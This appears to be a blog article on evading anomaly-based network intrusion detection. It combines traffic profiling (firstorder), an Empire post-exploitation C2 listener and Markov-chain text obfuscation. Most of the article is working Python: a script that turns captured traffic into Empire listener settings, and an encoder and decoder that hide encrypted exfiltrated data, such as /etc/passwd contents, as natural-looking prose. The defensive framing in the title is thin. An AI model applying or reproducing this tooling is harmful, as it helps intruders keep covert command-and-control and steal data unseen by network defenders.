Use this tool to detect if your Network Anomaly detection solution is working smoothly

Don’t you just enjoy it when someone has an awesome idea? I certainly do. On the blog of Utku Sen you can find an article which describes how it is possible to evade anomaly-based network intrusion detection systems (NIDS).

We have summarized the important pieces of the blog right here for you.

What is the name of the tool that is used to evade anomaly detection?

It is not a single tool. It is a combination of three tools and a method which, together, allow you to evade anomaly detection.

The first tool is firstorder. It analyses captured network traffic and tries to identify and build a profile of what normal traffic looks like.

The second tool is MarkovObfuscate, which disguises data as natural-language text.

The third tool is Empire, the post-exploitation framework whose C2 traffic is being hidden.

Each of these is discussed below.

Why is it important to have a normal traffic profile?

With a normal traffic profile, the listener can be configured so that the listener-agent communication blends in with what the network already carries. That gives it a much better chance of evading an anomaly-based NIDS: the NIDS simply does not see any ‘weird’ traffic taking place.

The post-exploitation framework

In this project, the author used the Empire post-exploitation framework. This framework is based on PowerShell and Python.

Empire supports HTTP and HTTPS listeners (as well as Dropbox and others) for C2-agent communication. Even though an HTTPS connection encrypts all communication, we will assume there is a solution on the network which intercepts and decrypts SSL/TLS traffic.

Because the author takes into account that SSL/TLS interception will be in place in the target environment, the project uses HTTP-based communication:

The HTTP listener has the following key options:

  • KillDate: Date for the listener to exit
  • DefaultDelay: Agent delay/reach-back interval
  • WorkingHours: Hours for the agent to operate
  • DefaultProfile: User-agent value and URI specification for the agent
  • DefaultJitter: Jitter in the agent reach-back interval
  • Port: Listening port of the C2 server
  • StagingKey: Staging key for the initial agent negotiation
  • ServerVersion: Server header for the C2 server

The HTTP listener encrypts agent communication with a symmetric cipher even without an SSL/TLS connection, so interception of the transport does not expose the content, but it does expose the traffic characteristics listed below.

What does the NIDS look for?

In this project, the author mentions that at least the following values are used by a NIDS to detect anomalies:

  1. Request URI
  2. User-agent value
  3. Server header
  4. Default HTML Content
  5. Port
  6. Connection Interval (DefaultDelay)

So how will the trojan communicate?

The author divides the communication traits into two groups. The first group holds the following values:

  • Request URI
  • User-agent value
  • Server header
  • Port
  • Connection interval

The second group holds:

  • Default HTML Content
  • POST Request Body

The article also points out that in this type of attack the POST body usually carries encrypted data, which looks like random gibberish. Anomaly detection systems pick this up quickly, which is why the author uses MarkovObfuscate, an obfuscation project by the Cylance SPEAR team.

The main attack method

The main attack steps are:

  1. Capture normal network traffic and derive the normal behaviour of users from it.
  2. Change Empire’s listener traits according to the profile from the first step.
  3. Start the C2-agent communication.

To normalize the first group of traits, we extract the most common URI, user-agent, server header and port values from the traffic capture, together with the typical interval between requests, and set the corresponding listener options from these values.
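The profiling step described above, as an added example in Python that is not part of the original article and not the firstorder tool itself. It parses a small constructed capture (raw HTTP request/response pairs with timestamps, client IP and server port; all values are made up), counts the first-group traits, takes the median inter-request interval per client as the delay, and prints the matching Empire listener `set` commands. The hostnames, IPs and user-agent strings are assumptions; the `uri1,uri2|User-Agent` layout of `DefaultProfile` and the `set` command names follow Empire’s own listener conventions.

```python
import statistics
from collections import Counter, defaultdict

# Two user-agent strings for the constructed capture below (values are made up).
UA_CHROME = ("Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 "
             "(KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36")
UA_CURL = "curl/7.55.1"


def http_pair(uri, user_agent, server):
    """Build one raw request/response pair for the constructed capture."""
    request = (f"GET {uri} HTTP/1.1\r\nHost: www.example.com\r\n"
               f"User-Agent: {user_agent}\r\nAccept: */*\r\n\r\n")
    response = (f"HTTP/1.1 200 OK\r\nServer: {server}\r\n"
                f"Content-Type: text/html\r\n\r\n<html></html>")
    return request, response


# Constructed capture: (epoch seconds, client IP, server port, request, response).
# Real input would come from a pcap or proxy log; these seven flows are made up.
CAPTURE = [
    (1000.0, "10.0.0.5", 80, *http_pair("/news/index.php", UA_CHROME, "nginx")),
    (1062.0, "10.0.0.5", 80, *http_pair("/news/story.php?id=7", UA_CHROME, "nginx")),
    (1118.0, "10.0.0.5", 80, *http_pair("/news/index.php", UA_CHROME, "nginx")),
    (1181.0, "10.0.0.5", 80, *http_pair("/images/logo.png", UA_CHROME, "nginx")),
    (1010.0, "10.0.0.9", 443, *http_pair("/api/v1/status", UA_CURL, "Apache")),
    (1070.0, "10.0.0.9", 80, *http_pair("/news/index.php", UA_CHROME, "nginx")),
    (1130.0, "10.0.0.9", 80, *http_pair("/news/index.php", UA_CURL, "nginx")),
]


def parse_message(raw):
    """Split a raw HTTP message into its start line and a lower-cased header dict."""
    head = raw.split("\r\n\r\n", 1)[0]
    start, *lines = head.split("\r\n")
    headers = {}
    for line in lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return start, headers


def build_profile(capture, top_uris=3):
    """Count the first-group traits and derive the typical request interval."""
    uris, agents, servers, ports = Counter(), Counter(), Counter(), Counter()
    seen = defaultdict(list)            # client IP -> request timestamps
    for ts, client, port, request, response in capture:
        start, req_hdrs = parse_message(request)
        _, resp_hdrs = parse_message(response)
        _method, target, _version = start.split(" ", 2)
        uris[target.split("?", 1)[0]] += 1          # path only, no query string
        agents[req_hdrs.get("user-agent", "")] += 1
        servers[resp_hdrs.get("server", "")] += 1
        ports[port] += 1
        seen[client].append(ts)
    intervals = []
    for stamps in seen.values():
        stamps.sort()
        intervals += [b - a for a, b in zip(stamps, stamps[1:])]
    return {
        "uris": [u for u, _ in uris.most_common(top_uris)],
        "user_agent": agents.most_common(1)[0][0],
        "server": servers.most_common(1)[0][0],
        "port": ports.most_common(1)[0][0],
        # Median is robust against the odd long gap; fall back to Empire's
        # default of 60 seconds when the capture holds no repeat visitors.
        "delay": round(statistics.median(intervals)) if intervals else 60,
    }


def empire_listener_commands(profile, name="normal"):
    """Render the profile as the set commands typed into Empire's listener menu."""
    default_profile = ",".join(profile["uris"]) + "|" + profile["user_agent"]
    return [
        "uselistener http",
        f"set Name {name}",
        f"set Port {profile['port']}",
        f'set DefaultProfile "{default_profile}"',
        f"set ServerVersion {profile['server']}",
        f"set DefaultDelay {profile['delay']}",
        "execute",
    ]


if __name__ == "__main__":
    print("\n".join(empire_listener_commands(build_profile(CAPTURE))))
```

The same counting can be extended to the remaining listener options: DefaultJitter from the spread of the observed intervals and WorkingHours from the hours of the day in which the captured clients were active. Note that this only normalizes the static traits; the size and entropy of the POST body is the second group and is handled separately.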

The second group

For the second group of traits, the default HTML content can be chosen by identifying the most visited websites in the traffic capture. Normalizing the POST request body of the communication, however, cannot be done from the traffic capture. As explained in the previous sections, the POST body is encrypted and therefore consists of gibberish characters.

The solution for the POST requests

Instead of sending the encrypted data directly, we can run it through the Markov obfuscation tool created by the Cylance SPEAR team.

Used correctly, it turns the contents of a plain /etc/passwd file into text that reads like the prose it was trained on. (The article shows before and after screenshots of the file; they are not reproduced here.)

The steps which need to be taken:

  1. First, encode the encrypted content with Base64 to get rid of the gibberish characters.
  2. As discussed, we also need a lot of text to use as training data. One way would be to include the training data inside the agent, but that is not practical, since it would increase the agent size by something like ten megabytes. Instead, we can download the dataset from an external source. It does not have to be our own website: the agent can be programmed to crawl and parse text from news websites, blogs, etc.
  3. Train the Markov obfuscation algorithm with the downloaded training data.
  4. Encode the data with the generated model.
  5. Send the encoded data to the C2 server, together with a reference to the training data.
  6. The C2 server builds the same model from the same training data and is therefore able to decode the main data.
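The six steps above, as an added example in Python. This is not the article's code and not the MarkovObfuscate project itself; it is a minimal first-order Markov obfuscator written to show the mechanism: both sides build the same word-transition model from the same training text, the encoder walks the chain and spends each step's bits on choosing which follower to emit, and the decoder replays the walk and reads the chosen indices back. The training text and the payload are constructed for the example; the "encrypted" input is a plain /etc/passwd line standing in for the agent's AES output, and the 16-bit length prefix is an assumption of this example, not of the real tool.

```python
import base64
import re
from collections import Counter, defaultdict

# Constructed training text standing in for the news pages or blog posts the
# agent would download at run time. The C2 server fetches the same text, so
# both sides build an identical model without the agent carrying it.
TRAINING_TEXT = """
The market opened higher on Monday as investors weighed fresh data on inflation and jobs.
The central bank said it would hold rates steady while the economy adjusts to higher prices.
Analysts said the report was stronger than expected and the dollar rose against the euro.
The company said it would cut costs and the shares fell in early trading on the news.
Officials said the plan would help the region and the council voted to approve the budget.
The weather service said the storm would weaken as it moved inland on Tuesday morning.
"""


def build_model(text):
    """Return (successors, start_word) for a first-order Markov model of text.

    successors[w] lists the distinct words seen after w, ordered by descending
    frequency with alphabetical tie-breaks, so encoder and decoder agree on the
    index of every word.
    """
    words = re.findall(r"[a-z]+", text.lower())
    counts = defaultdict(Counter)
    for cur, nxt in zip(words, words[1:]):
        counts[cur][nxt] += 1
    successors = {
        w: [nxt for nxt, _ in sorted(c.items(), key=lambda kv: (-kv[1], kv[0]))]
        for w, c in counts.items()
    }
    # The word with the most followers is the start word and the reset word
    # used whenever the chain reaches a word with fewer than two followers.
    start = max(successors, key=lambda w: len(successors[w]))
    return successors, start


def _bits_per_step(k):
    """A word with k possible followers can carry floor(log2 k) bits."""
    return k.bit_length() - 1


def encode(payload, model):
    """Hide payload bytes in a sequence of words drawn from the model."""
    successors, start = model
    framed = len(payload).to_bytes(2, "big") + payload   # 16-bit length prefix
    bits = "".join(f"{b:08b}" for b in framed)
    out, cur, pos = [start], start, 0
    while pos < len(bits):
        followers = successors.get(cur, [])
        if len(followers) < 2:        # dead end: reset to start, carrying no data
            cur = start
            out.append(cur)
            continue
        n = _bits_per_step(len(followers))
        chunk = bits[pos:pos + n].ljust(n, "0")   # zero-pad the final step
        cur = followers[int(chunk, 2)]
        out.append(cur)
        pos += n
    return " ".join(out)


def decode(text, model):
    """Recover the payload by replaying the walk and reading each chosen index."""
    successors, start = model
    words = text.split()
    if not words or words[0] != start:
        raise ValueError("text does not start with the model's start word")
    bits, cur = [], start
    for w in words[1:]:
        followers = successors.get(cur, [])
        if len(followers) >= 2:       # only these steps carried data
            n = _bits_per_step(len(followers))
            bits.append(f"{followers.index(w):0{n}b}")
        cur = w
    bitstr = "".join(bits)
    length = int(bitstr[:16], 2)
    body = bitstr[16:16 + 8 * length]             # drop the zero padding
    return bytes(int(body[i:i + 8], 2) for i in range(0, len(body), 8))


def demo():
    """Step 1 (Base64) plus steps 3 to 6 of the procedure on one /etc/passwd line."""
    agent_model = build_model(TRAINING_TEXT)
    ciphertext = b"root:x:0:0:root:/root:/bin/bash"     # stands in for AES output
    wire = encode(base64.b64encode(ciphertext), agent_model)   # goes in the POST body
    c2_model = build_model(TRAINING_TEXT)               # server trains independently
    recovered = base64.b64decode(decode(wire, c2_model))
    return wire, recovered


if __name__ == "__main__":
    wire, recovered = demo()
    print(wire)
    print(recovered)
```

The output consists only of words from the training text, which is what defeats a detector looking for high-entropy or non-printable POST bodies. The price is bandwidth: each word carries only floor(log2 k) bits for a word with k followers, so the body grows to many times the size of the Base64 input, and Base64 itself adds a third on top. A real deployment also has to keep the training text and its tokenization byte-identical on both sides, since a single differing word shifts every index after it.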


References:

  1. https://github.com/tearsecurity/firstorder
  2. https://utkusen.com/blog/bypassing-anomaly-based-nids-with-empire.html
  3. https://github.com/CylanceSPEAR/MarkovObfuscate